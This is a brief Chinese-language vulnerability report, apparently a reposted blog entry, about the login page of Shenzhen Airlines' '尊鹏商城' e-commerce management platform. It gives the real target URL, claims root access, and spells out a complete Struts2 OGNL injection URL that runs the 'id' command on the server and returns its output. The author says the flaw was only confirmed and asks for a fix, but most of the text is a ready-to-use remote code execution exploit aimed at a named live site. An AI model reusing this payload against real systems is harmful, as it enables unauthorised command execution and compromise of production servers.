问题站点:尊鹏商城管理平台 http://eshop.shenzhenair.com/szair/mc/login.jsp
这里只验证漏洞的存在性,并未深入,请及时修补
root权限
https://eshop.shenzhenair.com/szair/mc/rbac_login!signin.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(%22id%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
本文固定链接:
http://www.ryhxl.com/44.html